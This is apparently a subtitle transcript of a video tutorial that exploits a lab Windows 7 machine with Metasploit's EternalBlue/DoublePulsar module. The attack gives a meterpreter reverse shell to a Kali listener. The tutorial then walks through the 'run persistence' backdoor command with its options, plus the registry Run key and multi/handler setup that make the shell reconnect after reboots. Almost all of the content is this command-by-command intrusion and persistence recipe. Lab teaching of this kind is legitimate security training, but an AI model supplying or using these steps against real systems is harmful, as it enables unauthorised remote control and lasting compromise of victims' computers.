1 00:00:00,030 --> 00:00:06,990 Hello everybody and welcome back. And now let us start off by actually running the 2 00:00:06,990 --> 00:00:11,280 persistence on our target machine. So I'm starting up right here Windows 7. 3 00:00:11,280 --> 00:00:17,430 Let's start Windows normally since I had a problem running it a few seconds ago. And 4 00:00:17,430 --> 00:00:22,680 right now what we will try is we will try to actually run our persistence 5 00:00:22,680 --> 00:00:27,300 backdoor on the target system, which would actually allow us to connect to it 6 00:00:27,300 --> 00:00:33,780 anytime we want. So, basically, if you have noticed, once we get the meterpreter shell 7 00:00:33,780 --> 00:00:39,090 and if we reboot the machine, we will not be able to connect back to the target. So the 8 00:00:39,090 --> 00:00:45,060 target could actually prevent us from exploiting their computer, or actually 9 00:00:45,059 --> 00:00:49,739 gathering some information after we get the shell open, by just shutting down the 10 00:00:49,739 --> 00:00:54,329 PC, if we didn't run the persistence. So the persistence is something that you 11 00:00:54,329 --> 00:00:59,069 want to run at the very beginning of exploitation. Right after you get the 12 00:00:59,070 --> 00:01:03,930 meterpreter shell, that is most likely the first thing you want to do. So let us 13 00:01:03,930 --> 00:01:09,920 see how we can do that. So I opened up my Windows 7 machine, it is working normally. 14 00:01:09,920 --> 00:01:15,180 Let us just check out once again its IP address. So it should be .1.5 I 15 00:01:15,180 --> 00:01:22,170 believe...ipconfig, and it really is .1.5. So right now let us go to our Kali Linux 16 00:01:22,170 --> 00:01:26,850 machine. And right here we have the Metasploit open, and what we want to do, 17 00:01:26,850 --> 00:01:32,610 basically, let's perform the previous exploit real fast. So we want to 18 00:01:32,610 --> 00:01:38,850 use exploit/windows/eternalblue_doublepulsar, show options. We want to 19 00:01:38,850 --> 00:01:45,380 set RHOSTS to 192.168.1.5. Set TARGETARCHITECTURE 20 00:01:45,380 --> 00:01:57,750 to x64, since Windows 7 is 64 bit. Set PROCESSINJECT to this file, we paste it 21 00:01:57,750 --> 00:02:11,170 right here. We set payload to be windows/x64/meterpreter/reverse_tcp 22 00:02:11,170 --> 00:02:16,630 set LHOST at the end to be 192.168.1.4. Pardon 23 00:02:16,630 --> 00:02:21,100 me, RHOSTS should be the IP address of the of the Windows 7 machine, 24 00:02:21,100 --> 00:02:26,530 so let's change that. So set RHOSTS to 192.168.1.5, which is the 25 00:02:26,530 --> 00:02:32,200 IP address of our Windows 7 machine. So show options, and right now we should be 26 00:02:32,200 --> 00:02:36,460 good to go. So just run here exploit, and we should get a meterpreter shell with 27 00:02:36,459 --> 00:02:45,279 system privileges on the target system. So after we do that we will load a module 28 00:02:45,280 --> 00:02:50,530 called persistence, and we will actually try to create, try to get the meterpreter 29 00:02:50,530 --> 00:02:55,570 shell back even after we reboot the Windows 7 machine. But before we do that, 30 00:02:55,570 --> 00:03:03,340 we need to wait for our session to open. So, I hope it will do it real fast. So 31 00:03:03,340 --> 00:03:11,170 let's see...launching eternal blue, we specified everything correctly, timed out 32 00:03:11,170 --> 00:03:17,590 waiting to SelectionNotify event. What do you mean by that? But we did get the 33 00:03:17,590 --> 00:03:23,800 shell back, so it doesn't really matter. getuid and we are system. So not really 34 00:03:23,799 --> 00:03:28,329 sure what this error right here is, but we were able to get the system. So print 35 00:03:28,329 --> 00:03:35,049 working directory, we can see that we are in C:\windows\system32. Good! Now after we 36 00:03:35,049 --> 00:03:41,649 actually exploit it, now let's run the persistence. So, we run it with this 37 00:03:41,650 --> 00:03:49,120 command. So run persistence -h to see our available options. Usage: run 38 00:03:49,120 --> 00:03:52,600 Executes a Ruby script or Metasploit Post Module in the context of the 39 00:03:52,600 --> 00:03:59,740 meterpreter session. Okay, so it doesn't give us the the module 40 00:03:59,739 --> 00:04:03,249 options, but it doesn't matter. I will just type here the command and I will 41 00:04:03,250 --> 00:04:08,560 explain to you what it all means. So, let us run the command. So what you want to 42 00:04:08,560 --> 00:04:12,270 do is run persistence 43 00:04:12,359 --> 00:04:18,939 -u, which basically stands for automatically start the program, or our 44 00:04:18,940 --> 00:04:24,980 reverse shell, when the user logs on. Now you can also use -X, so when the user, 45 00:04:24,980 --> 00:04:30,110 when the system boots you can use that. So -X is automatically start the 46 00:04:30,110 --> 00:04:35,360 agent when the system boots. And -u is automatically start the agent when 47 00:04:35,360 --> 00:04:42,200 the user logs in. We will use -u in this case. Now we will use -i for the 48 00:04:42,200 --> 00:04:47,810 interval between each connection attempt. So, for example, let's say we wouldn't get, 49 00:04:47,810 --> 00:04:54,470 we weren't able to actually set up our listener at the 50 00:04:54,470 --> 00:05:01,070 correct time when the system was booted, and we missed the first connection try. 51 00:05:01,070 --> 00:05:05,720 So we want to set this to try to connect to us every, for example, 10 seconds, so 52 00:05:05,720 --> 00:05:09,890 let's type here 10 seconds, so we can actually connect anytime we want while 53 00:05:09,890 --> 00:05:14,780 the system is running. So, the thing that we want to specify after that 54 00:05:14,780 --> 00:05:20,120 is -p for the port, and let's use port 443. And of course after that you want to 55 00:05:20,120 --> 00:05:27,070 use -r which is the remote address of the, basically this is our IP address. So, 56 00:05:27,070 --> 00:05:31,490 this is the IP address that the target machine will try to connect to, which 57 00:05:31,490 --> 00:05:36,500 should be the IP address of your Kali Linux machine, which in my case is 58 00:05:36,500 --> 00:05:42,230 .1.4. So after you do that you just click here enter, run persistence, and we 59 00:05:42,230 --> 00:05:46,250 specify the entire command right here, and it will run the persistence for us, 60 00:05:46,250 --> 00:05:51,290 and it will create a registry key in the registry key folder. So we can see right 61 00:05:51,290 --> 00:05:56,570 here, let's actually analyze this a little bit. So what this did is 62 00:05:56,570 --> 00:05:59,540 basically persist the script written to this path right here. 63 00:05:59,540 --> 00:06:05,570 So in temp we got the .vbs script with a weird name, and basically 64 00:06:05,570 --> 00:06:10,430 this .vbs script is basically just a copy of the meterpreter shell in 65 00:06:10,430 --> 00:06:17,180 the temporary folder. And it also created a registry key in the current user, in the 66 00:06:17,180 --> 00:06:22,430 current user registry, in the run startup folder, and it named it like this. 67 00:06:22,430 --> 00:06:26,690 So basically what this registry key does is at every boot up it will run this 68 00:06:26,690 --> 00:06:31,550 program, which is our meterpreter shell. It will also try to connect every 10 69 00:06:31,550 --> 00:06:37,070 seconds. So now that we actually ran the 70 00:06:37,070 --> 00:06:40,610 persistence, let's actually reboot the machine and see if it works. 71 00:06:40,610 --> 00:06:46,010 Now while you reboot the machine you need to actually set up the listener. 72 00:06:46,010 --> 00:06:50,240 Since our eternal blue double pulsar isn't really a listener we need 73 00:06:50,240 --> 00:06:55,250 to set up a regular use exploit multi handler, and then our regular listener. So 74 00:06:55,250 --> 00:06:59,900 let's reboot the machine, and we can check that the machine really is shutting 75 00:06:59,900 --> 00:07:04,690 down, so it is rebooting or restarting. And while we do that, we want to exit this, 76 00:07:04,690 --> 00:07:13,760 and we want to use exploit/multi/handler. Set payload to be the same payload we 77 00:07:13,760 --> 00:07:23,180 specified in the exploit, so windows/x64/meterpreter/reverse_tcp. 78 00:07:23,180 --> 00:07:29,360 Set LHOST to be 192.168.1.4 and set LPORT to 79 00:07:29,360 --> 00:07:35,510 be 443, since LPORT 443 is something that we specified in our persistence command. 80 00:07:35,510 --> 00:07:41,960 And now we type exploit, and we are waiting for incoming connections. And it 81 00:07:41,960 --> 00:07:46,910 should prompt us with a meterpreter shell as soon as this Windows 7 machine 82 00:07:46,910 --> 00:07:55,430 boots up. So let's wait for it to connect to the internet...and in just a few 83 00:07:55,430 --> 00:08:01,340 seconds we should be getting the meterpreter session opened. We still 84 00:08:01,340 --> 00:08:10,820 didn't get it, no idea why, but it should come soon. No idea why we didn't get it. 85 00:08:10,820 --> 00:08:16,310 We should have got it. So we can check the registry in this Window 7. So 86 00:08:16,310 --> 00:08:20,330 let's go run, and then let's open regedit right here 87 00:08:20,330 --> 00:08:26,300 in order for us to open the registry folder. Let's go to the registry where we 88 00:08:26,300 --> 00:08:34,910 saved our file. So, current user, software, Microsoft. Then we go to the windows I 89 00:08:34,910 --> 00:08:38,270 believe. Okay, so windows, currentversion, and then 90 00:08:38,270 --> 00:08:48,310 run. Value not set, so we were not even able to set the value for it. 91 00:08:48,960 --> 00:08:55,390 Now why didn't it set? I have no idea. Let us try it once again. So let's close 92 00:08:55,390 --> 00:09:01,540 this, let's actually use the same thing as before which is the use exploit multi 93 00:09:01,540 --> 00:09:07,030 handle double pular, show options. So, we should already have our 94 00:09:07,030 --> 00:09:13,840 presets, and let's exploit this. And let's see if I run the same command in 95 00:09:13,840 --> 00:09:20,920 the meterpreter, will we get the registry key right here? Let's actually check in 96 00:09:20,920 --> 00:09:37,240 the CMD, so change AppData. Let's just wait for this to open. It should have 97 00:09:37,240 --> 00:09:44,260 written us a registry key, not really sure why it didn't, but we will try to 98 00:09:44,260 --> 00:09:47,800 fix that right now. So we got a meterpreter session open with eternal 99 00:09:47,800 --> 00:09:51,730 blue double pulsar, and what we want to do is actually run the same command 100 00:09:51,730 --> 00:09:59,680 as before. Run resistance as user logs in. Let's actually type as system 101 00:09:59,680 --> 00:10:04,710 boots, 10 seconds, remote address to be this one. And hopefully 102 00:10:04,710 --> 00:10:15,790 right now if we refresh this, so it created at local machine. So now it is 103 00:10:15,790 --> 00:10:21,490 created at local machine. So let's see if it is there. It should be named like 104 00:10:21,490 --> 00:10:28,570 this, so this random letter. So let's go to the local machine, to the software, to 105 00:10:28,570 --> 00:10:36,040 the Microsoft, to the Windows. It's basically the same path, you just find 106 00:10:36,040 --> 00:10:44,100 where Windows is. Okay, so windows currentversion, and then the run folder. 107 00:10:44,100 --> 00:10:53,740 And let's see if it is there, and here it is. So right now this did work. So let me 108 00:10:53,740 --> 00:10:59,810 just see right now if we reboot the PC right now, 109 00:10:59,810 --> 00:11:09,840 and exit the session, and set up our handler once again, so multi handler, show 110 00:11:09,839 --> 00:11:15,209 options, and we exploit since everything is already set, so the IP address set, the 111 00:11:15,209 --> 00:11:21,269 port set, and we run this. Now the problem could be is that it puts this in the temp 112 00:11:21,270 --> 00:11:27,950 directory, which I think we can change, but basically this is the idea of the 113 00:11:27,950 --> 00:11:39,810 persistence. We can actually specify the directory as well if you wanted to, so we 114 00:11:39,810 --> 00:11:43,620 do not need to put it into temporary directory. I'm not really sure if temp 115 00:11:43,620 --> 00:11:52,680 directory actually deletes all the files at the reboot. So let's see if 116 00:11:52,680 --> 00:12:04,220 we open up the run once again, so run, and then regedit. We go right there, 117 00:12:04,220 --> 00:12:15,630 we want to open that, we go to the local machine, software, Microsoft to the 118 00:12:15,630 --> 00:12:22,110 Windows I believe, it should be Windows. Okay, so it is all the way down. Windows 119 00:12:22,110 --> 00:12:30,060 currentversion, and then the run right here. And we still have it right there. So 120 00:12:30,060 --> 00:12:36,810 I'm not really sure why this doesn't work, why it won't open the file, but 121 00:12:36,810 --> 00:12:41,520 basically this is the simple idea behind this. Now I tried this yesterday on 122 00:12:41,520 --> 00:12:46,890 Windows 10 and it does work, so maybe it's some problem with the Windows 7. It 123 00:12:46,890 --> 00:12:53,100 doesn't even matter. Now the point is that this is 124 00:12:53,100 --> 00:12:57,300 the process of actually making a persistence. So you should actually be 125 00:12:57,300 --> 00:13:02,040 able to use this on Windows 10, for example, not really sure why it doesn't 126 00:13:02,040 --> 00:13:06,210 work here. I will actually check it out and maybe tell you in the next video 127 00:13:06,209 --> 00:13:09,209 what the problem was, if there was any problem. 128 00:13:09,209 --> 00:13:12,929 And that would be about it for this tutorial. I hope I see you in the next 129 00:13:12,929 --> 00:13:16,519 one and take care. Bye!